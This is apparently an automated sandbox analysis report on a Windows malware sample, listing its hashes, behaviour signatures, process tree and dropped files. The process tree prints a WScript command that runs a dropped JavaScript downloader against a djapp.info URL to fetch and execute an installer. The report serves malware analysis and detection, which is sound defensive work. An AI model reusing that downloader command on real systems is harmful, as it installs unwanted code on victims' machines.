Analysis

  • max time kernel
    117s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    25/04/2024, 20:52

General

  • Target

    000d059c70454bb1a52bb2f945eb5133_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    000d059c70454bb1a52bb2f945eb5133

  • SHA1

    925b0b1856d4778f86fda53cddb882c1535d01a2

  • SHA256

    7db5638e6dea74fb656c9b6271daf68054b672b9eedb40a14bb306d759457a05

  • SHA512

    79e9f404922c2c7ad4b87b7a4b233609ddd145ed672c11e1193408fe4bd9fabe462fd20e4500247f2a643527f1c50fe89219c9884934f04bff0e62ecbee5529a

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3c:/7BSH8zUB+nGESaaRvoB7FJNndn5

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\000d059c70454bb1a52bb2f945eb5133_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\000d059c70454bb1a52bb2f945eb5133_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2196
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11AD.js" http://www.djapp.info/?domain=QAhoWuDkko.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf11AD.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2036
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11AD.js" http://www.djapp.info/?domain=QAhoWuDkko.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf11AD.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2540
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11AD.js" http://www.djapp.info/?domain=QAhoWuDkko.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf11AD.exe
      2⤵
      • Blocklisted process makes network request
      PID:1648
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11AD.js" http://www.djapp.info/?domain=QAhoWuDkko.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf11AD.exe
      2⤵
      • Blocklisted process makes network request
      PID:940
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf11AD.js" http://www.djapp.info/?domain=QAhoWuDkko.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf11AD.exe
      2⤵
      • Blocklisted process makes network request
      PID:776
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 556
      2⤵
      • Program crash
      PID:1976

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    4ec20346a7b5dd75cfde7b15df208cf0

    SHA1

    517b437fc42dfc6e2f0d055dc678a0c080d47a0b

    SHA256

    4e3ee32076baf8538d9b9473169229647c419aa92f4bef71fb12fb714ac4e77d

    SHA512

    dff871a49c68eebb57eb5d21c197c5f47adc2444edde5f9da25c35a91519747cdb07aae26adfebcf0e48409f45ed8e040ec1c777910942aa7c18268bc6bcd7d1

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    68KB

    MD5

    29f65ba8e88c063813cc50a4ea544e93

    SHA1

    05a7040d5c127e68c25d81cc51271ffb8bef3568

    SHA256

    1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

    SHA512

    e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    08cfef75235f87b8ffe8b06fbe38522f

    SHA1

    eb296d2f82ced85e8a614cac5c0cfdea80729a2f

    SHA256

    4323b8c66473329a24587066092c75d236bbfc79e82014919598009635027c63

    SHA512

    33d1ece27770df1cdc66e7453db2b05ec50d5b0df964b2830df9f0d61703206c58e467fbe47626e33ec6efda0dcec50d306ca3a703c996d0000542b64a26bc06

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    5792bd6b13251acc54625b2ad2f3199e

    SHA1

    918100bba9d018edc269d1445c994e2fd49b7959

    SHA256

    d743ae1a955975f61c08090f095bb01dd825c16bc02938943c8a449958d43092

    SHA512

    fa45bba2ad8c50664de190f74c47aa13cc83ec93e02e3515a4e3363faeae5470eb0350765ce51b865cf88c537601578c839741593e67f67b55b4f2d7d3f19948

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    2db34ae1fa043e8e2bb08bece09bc97f

    SHA1

    2c864dea1cbd4a427cbf0ffc70147c0e1a70e538

    SHA256

    af524d4eec6a37f35e2d38581ace1db7b8157e2f71614ae63620fa1c8d21f18e

    SHA512

    73207de11273eade9af793cf0135def1f582488362ddeac52f6db5133cbef80c52946dca4cae2994fea3aaa0252b3ea69dd72888a4c41d71b20ac2d7af0ceb21

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    7c329d9d09f41e91ff80ec3c3e5a9390

    SHA1

    2b301335ec36aaf99b3a2b3fb038c1c0e1139904

    SHA256

    9ebe324c9c6e2eb5ef6434836a15339f5e5cc878a6121d1fd74acec3a68ee356

    SHA512

    a6c057fd063972c9b8787eb0af20b978556b74f06fdf72397282d44508eb16ec11c5d4bfe751e40e9f131579acf1850d75b15cebe59c64d3c2083b28dbe01c0a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J1E28MVO\domain_profile[1].htm

    Filesize

    40KB

    MD5

    c1f9e4e6ba1d6743e4740d7bf1b733fa

    SHA1

    b782796f9a67de50ceabce6cbc4597205b7e849f

    SHA256

    7122527d597e2985bc2e01902c9848482d3f8a0f897139fa77d75adb6e123305

    SHA512

    4b8d7d177268ad78ab003f3ba170ed91affa4c8e08b7d19635962d98375cbda08e3adbc6c6ec529828f24fbacb0ff7e0c14ee095a3d3441be1323a3dfbb959bf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\J1E28MVO\domain_profile[1].htm

    Filesize

    6KB

    MD5

    5653a0321d1563680190fc38398bb1eb

    SHA1

    32d361167ff7cad7bbf9f249673a3288144c9cf3

    SHA256

    0b16468f03145282b43c1ffde96de134af9a36a95c1748b93a48a42031a51cf5

    SHA512

    d25d96f34db22ecc0e049819055676390fdd652ac1dea1ad2bae67ef6ade3b4383b66dfda2139537c25f510ca4f37112c4880a366b53eafc563be2c162ed5a0c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XHGRWZWB\domain_profile[1].htm

    Filesize

    40KB

    MD5

    bcb8a394d6b6bdc4a3c5adabee23ccd4

    SHA1

    977b9f33e65293c876bd4eb81e070cb0181f42c4

    SHA256

    1bcc46fb8a56abb28d0c9d52c0288104687133798b17e351df20ef6b33368317

    SHA512

    d528b9dfea1108a6267cecb11811873f33e000413acab6f8077249dcc7ee2cf48ddb4ea09a2b90bc853c5cb10c045eb558d4da7b49da159e4da1326e3a20a407

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XHGRWZWB\domain_profile[1].htm

    Filesize

    40KB

    MD5

    136c0ffe0659f6a51b66426f31e58abf

    SHA1

    084cb0427932b7aa4b218e6de189defe8b9b7eda

    SHA256

    e8ba96f4b4a226cce0ac596dcd4c64aa389813035c78028555972fd7899d982f

    SHA512

    a57031d28c9da7d1a434b90329d39692791d556d1cf18e1d9f9d38a06a7de4b914c6af98df3a5881c0b3fddab26c010c1c92afa9f49531819971637e19a0f865

  • C:\Users\Admin\AppData\Local\Temp\Tar5A13.tmp

    Filesize

    177KB

    MD5

    435a9ac180383f9fa094131b173a2f7b

    SHA1

    76944ea657a9db94f9a4bef38f88c46ed4166983

    SHA256

    67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

    SHA512

    1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

  • C:\Users\Admin\AppData\Local\Temp\fuf11AD.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\G3SRUJ1I.txt

    Filesize

    175B

    MD5

    ec7b38550a25f2f2c51e70a6e8f76415

    SHA1

    21c840f9a0a3f15d64abba77c0a2f21e00f29854

    SHA256

    47b9bb1ac1f0e87dded55706d777f5092e6faebff4e949b9c248034159ec8839

    SHA512

    9d135c7cf56d3048f0662a29e24f59754c5e19608a7860d9c66cda0a76ce823a41456b921aba96ad1311fb93e1a2b0e5844524f5c4a878a252a6b8c1e186c124